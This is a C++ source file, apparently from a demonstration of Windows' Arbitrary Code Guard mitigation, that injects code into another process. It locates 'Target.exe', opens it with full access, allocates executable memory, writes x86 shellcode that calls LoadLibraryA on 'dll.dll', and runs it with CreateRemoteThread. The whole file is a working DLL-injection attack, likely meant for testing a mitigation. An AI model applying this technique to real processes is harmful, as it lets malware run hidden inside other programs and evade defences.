ArbitraryCodeGuard.zip/1/Attacker/Attacker.cpp
#include <iostream>
#include <Windows.h>
#include <memoryapi.h>
#include <Tlhelp32.h>
DWORD findProcess(const std::string filename) {
HANDLE snapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 entry;
entry.dwSize = sizeof(entry);
::Process32First(snapshot, &entry);
do {
if (filename == entry.szExeFile) {
::CloseHandle(snapshot);
return entry.th32ProcessID;
}
} while (::Process32Next(snapshot, &entry));
::CloseHandle(snapshot);
return 0;
}
void write(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesWritten) {
::WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten);
}
void* alloc(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {
return ::VirtualAllocEx(hProcess, lpAddress, dwSize, flAllocationType, flProtect);
}
bool run(const DWORD processId) {
if (processId == 0) {
return false;
}
unsigned char code[] = {
0x68, 0x00, 0x00, 0x00, 0x00, // PUSH 0x00000000(PUSH &"dll.dll")
0x68, 0x00, 0x00, 0x00, 0x00, // PUSH 0x00000000(PUSH &::LoadLibraryA)
0x58, // POP EAX
0xFF, 0xD0, // JMP EAX
0xC3, // RETN
};
const char dllName[] = "dll.dll";
*reinterpret_cast<void**>(&code[6]) = &::LoadLibraryA;
const HANDLE process = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId);
void* dllNameAddress = ::VirtualAllocEx(process, nullptr, sizeof(dllName), MEM_COMMIT, PAGE_READWRITE);
if (dllNameAddress == nullptr) {
return false;
}
*reinterpret_cast<void**>(&code[1]) = dllNameAddress;
write(process, dllNameAddress, dllName, sizeof(dllName), nullptr);
void* codeAddress = ::VirtualAllocEx(process, nullptr, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (codeAddress == nullptr) {
return false;
}
write(process, codeAddress, code, sizeof(code), nullptr);
::CreateRemoteThread(process, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(codeAddress), nullptr, 0, nullptr);
return true;
}
int main() {
if (!run(findProcess("Target.exe"))) {
std::cout << "Failure\n";
} else {
std::cout << "Success\n";
}
std::cin.get();
return 0;
}